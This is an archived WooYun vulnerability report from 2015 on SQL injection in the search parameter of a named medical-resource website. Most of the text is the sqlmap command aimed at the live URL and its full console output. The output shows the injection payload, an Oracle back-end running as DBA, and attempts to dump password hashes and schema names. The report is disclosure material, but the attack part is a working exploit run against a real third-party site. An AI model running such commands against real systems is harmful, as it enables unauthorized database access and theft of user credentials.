WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online browsing--------http://drop.zone.ci/
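2015-05-24: Details reported to the vendor; awaiting vendor handling
2015-05-29: The vendor has actively ignored the vulnerability; details disclosed to the public
As the title says.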
[root@Hacker~]# Sqlmap
Sqlmap -u "http://ziyuan.iiyi.com/source/search?kw=临床诊疗指南" --dbs --passwords --current-user --current-db --is-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o
[*] starting at 19:58:35
[19:58:35] [INFO] resuming back-end DBMS 'oracle'
[19:58:35] [INFO] testing connection to the target URL
[19:58:35] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: kw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kw=??????' AND 2191=2191 AND 'arWK'='arWK
---
[19:58:35] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, PHP 5.3.8
back-end DBMS: Oracle
[19:58:35] [INFO] fetching current user
[19:58:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:58:35] [INFO] retrieved:
[19:58:35] [INFO] heuristics detected web page charset 'utf-8'
[19:58:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user: None
[19:58:36] [INFO] fetching current database
[19:58:36] [INFO] retrieved:
[19:58:37] [WARNING] reflective value(s) found and filtering out
[20:00:38] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): None
[20:00:38] [INFO] testing if current user is DBA
current user is DBA: True
[20:00:38] [INFO] fetching database users password hashes
[20:00:38] [INFO] fetching database users
[20:00:38] [INFO] fetching number of database users
[20:00:39] [INFO] retrieved:
[20:00:42] [CRITICAL] unable to retrieve the number of database users
[20:00:42] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[20:00:42] [INFO] fetching database (schema) names
[20:00:42] [INFO] fetching number of databases
[20:00:42] [INFO] retrieved:
[20:00:46] [ERROR] unable to retrieve the number of databases
[20:00:46] [INFO] falling back to current database
[20:00:46] [INFO] fetching current database
[20:00:46] [INFO] retrieved:
[20:01:38] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[20:03:05] [CRITICAL] unable to retrieve the database names
[20:03:05] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 7 times
Severity: No impact (ignored by vendor)
Ignored at: 2015-05-29 08:12
Vulnerability Rank: 15 (WooYun rating)
None yet